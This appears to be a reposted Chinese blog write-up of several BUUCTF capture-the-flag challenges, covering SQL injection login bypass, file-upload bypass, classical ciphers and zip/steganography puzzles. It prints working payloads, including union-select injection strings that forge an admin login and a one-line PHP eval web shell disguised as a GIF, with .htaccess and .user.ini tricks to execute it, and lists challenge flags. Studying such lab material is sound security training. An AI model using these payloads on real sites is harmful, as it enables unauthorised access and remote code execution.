BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

这篇具有很好参考价值的文章主要介绍了BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

第七周第三次

目录

WEB

[GXYCTF2019]BabySQli

[GXYCTF2019]BabyUpload

Crypto

世上无难事

old-fashion

​Misc

面具下的flag

九连环


WEB

[GXYCTF2019]BabySQli

这是一道很新的题目

我们打开环境 发现登入注册界面 先看看源码有没有提示

发现有一个

php文件 进入看看

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

发现加密 先base32 再64

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

select * from user where username = '$name'

 发现就是很简单的字符型注入

开始尝试万能密码

1' or 1=1#
select * from user where username = '1'or 1=1#'

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 发现有过滤

bp fuzz看看

发现过滤了万能密码 () or for 这些

这里需要明白联合查询的特性

如果你输入了 union select 1,2,3#
会在数据库临时 打印一张虚拟的表

BUUCTF | [GXYCTF2019]BabySQli_山川绿水的博客-CSDN博客

该文章的图片

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 所以我们需要把我们的登入账号密码 作为临时密码来登入

我们先猜字节

admin' order by 4#

 文章来源地址https://www.toymoban.com/news/detail-412094.html

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

过滤了 我们随便试试看 是  order 还是 by

admin' Order by 4#

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 3个字节

我们开始 创建虚拟的表

账号 0' union select 1,'admin','123'#
密码 123

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 发现出错 这里就没有提示 我们应该判断是MD5加密密码 因为MD5加密不可逆

这里是没有提示的 只能猜

要加密小写的(试出来的)

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

账号 0' union select 1,'admin','202cb962ac59075b964b07152d234b70'#
密码 123

 

 BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

[GXYCTF2019]BabyUpload

这道题还比较简单 用我们以前积累的东西就可以上传成功

编写payload

1.jpg

GIF89a
<script language='php'>eval($_POST['a']);</script>

这里加了文件头  和 js辅助 来防止文件头检查 和php文件检查

现在有两个 一个是上传.user.ini 另一个是.htaccess

一个一个试过去吧

.htaccess

SetHandler application/x-httpd-php

这里没加文件头其实也无所谓 没有进行检查

.user.ini

GIF89a                  
auto_prepend_file=1.jpg 
auto_append_file=1.jpg  

我们开始上传

先上传1.jpg

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

再上传 .user.ini

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

我们抓包

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 更改类型为

image/jpeg

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

上传成功 看看能不能链接

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 很显然不可以

所以我们看看上传另一个

一样的步骤

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 我们看看能不能直接链接

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用 

Crypto

世上无难事

 

 

quipqiup - cryptoquip and cryptogram solver 

单词太多了 进去网站分析

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

把他变为 小写

flag{640e11012805f211b0ab24ff02a1ed09}

old-fashion

和上面一样的

Misc

面具下的flag

下载文件 放入010查看

发现有 pk

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 然后我们开始 改后缀

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 发现加密 看看是不是伪加密 放入010

50 4B 03 04

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

发现是 08 没有加密 

50 4B 01 02

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 发现后面是09 说明就是伪加密

我们改为偶数

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

使用kali的7z

7z x flag.vmdk 

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 发现加密

ook

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

只有一半 看看其他的

Brainfuck

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用 

 

flag{N7F5_AD5_i5_funny!}

Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]

九连环

下载完 得到文件

图片 放入010看看有没有藏文件

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

改后缀

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 发现加密 看看有没有伪加密

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 图片解压出来了 我们看看有没有隐藏东西放入010 没有 看看有没有隐写

放入kali

steghide info filename

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 

 发现隐写了

分离

steghide extract -sf filename

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用 

得到密码 解压

BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用

 

到了这里,关于BUUCTF-sql注入联合查询的创建虚拟表-词频-steghide的使用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • SQL注入进阶:掌握联合查询注入和报错注入攻击技巧

    数据来源         本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。 介绍         联合查询注入是SQL注入的一种,通过在原有的SQL语句中添加UNION(联合)操作,将恶意构造的

    2024年02月06日
    浏览(52)
  • sql注入中的union联合查询,union select 1,2,3

    (此文章是记录本人对知识理解的随手笔记,内容不肯定百分百正确,如有错误望指出并谅解) union联合查询是为了判断SQL语句中哪个地方可以被代替,代替的地方是可以在网页上显示出来的 { 例:若 select 1,2,3; 中的2这个地方可以被代替,我们就可以通过一些SQL语句或数据库函

    2024年02月08日
    浏览(54)
  • SQL 日期处理和视图创建:常见数据类型、示例查询和防范 SQL 注入方法

    在数据库操作中,处理日期是一个关键的方面。确保插入的日期格式与数据库中日期列的格式匹配至关重要。以下是一些常见的SQL日期数据类型和处理方法。 DATE - 格式为YYYY-MM-DD DATETIME - 格式为YYYY-MM-DD HH:MI:SS TIMESTAMP - 格式为YYYY-MM-DD HH:MI:SS YEAR - 格式为YYYY或YY DATE - 格式为YY

    2024年02月05日
    浏览(57)
  • 注入攻击(一)--------SQL注入(结合BUUCTF sqli-labs)

    为了准备信息安全技术课程汇报做的笔记,想着做了也是做了,不如分享出来给想我一样的 初学者学习 。本人之前 没有做过CTF ,也 没有学过 SQL注入, 零基础 ,所以 大佬可以先行离开 。 我的汇报内容是 SQL注入 XPath注入 HTML注入 另一篇文章讲HTML注入,例子给的比较简单,

    2024年02月16日
    浏览(45)
  • SQL注入之union 联合注入

    目录 一、union查询的特性 1.1、特性-1 1.2、特性-2 1.3、特性-3 二、union联合注入 2.1、让sqlib的Less-1页面显示出来2和3 2.2、MySQL中的一些函数 2.3、MySQL中的函数和union的联合使用方法 2.4、group_concat()函数 2.5、使用union和group_concat函数进行sql注入 2.6、分析注入过程 2.7、使用union获取

    2024年02月08日
    浏览(88)
  • 安全中级11:sql注入+联合、报错、时间盲注+sqlmap使用

    目录 一、sql注入原理  二、联合SQL注入的方法 1.总体的思路 (1)先进行闭合,进行报错 (2)进行逃逸 (3)外带数据 (4)获取库名 表名 列名 数据 (5)获取当前数据库中的数据 2.SQL注入测试 (1)先进行单双引号闭合,让页面出现页面报错 (2)然后看有几列,有两种方

    2024年02月13日
    浏览(33)
  • SQL高级篇~联合查询

    以下是一些关于 SQL 联合查询的详细信息: SQL 联合查询的基本语法如下: 其中, table_name1 和 table_name2 是要查询的表名, column_name(s) 是要返回的列的名称, UNION 将两个查询的结果集合并在一起。 在联合查询中,两个查询的结果集的列数和列类型必须相同,否则会导致

    2024年02月05日
    浏览(47)
  • Python MySQL 数据库查询:选择数据、使用筛选条件、防止 SQL 注入

    要从MySQL中的表格中选择数据,请使用\\\"SELECT\\\"语句: 示例选择\\\"customers\\\"表格中的所有记录,并显示结果: 注意 :我们使用 fetchall() 方法,该方法从上次执行的语句中获取所有行。 要仅选择表格中的某些列,请使用\\\"SELECT\\\"语句,后跟列名: 示例仅选择name和address列: 如果您只对

    2024年02月05日
    浏览(92)
  • sql创建查询视图语句

    学生表 c表 s表 sc表   --1.查询全体学生的学号,姓名与年龄 SELECT sno,sname,age=year(getdate())-year(sbirth) FROM S; --2.查询计算机系(CS)的学生学号,姓名 SELECT sno,sname FROM S WHERE sdept=\\\'计算机\\\'; --3.查询计算机系所有的女生姓名和年龄 SELECT sname,age=(year(getdate())-year(sbirth)) FROM S WHERE sdept

    2024年02月05日
    浏览(56)
  • 如何在conda中的创建查询删除虚拟环境等

    最近发现conda环境中有太多的虚拟环境,想要删除,重新创建管理。因此,查找资料后,记录如下: 打开终端或命令提示符,并执行以下命令: bash conda create --name your_environment_name python=3.x 将 your_environment_name 替换为你想要的环境名称,python=3.x 替换为你想要的Python版本。 例如

    2024年01月23日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包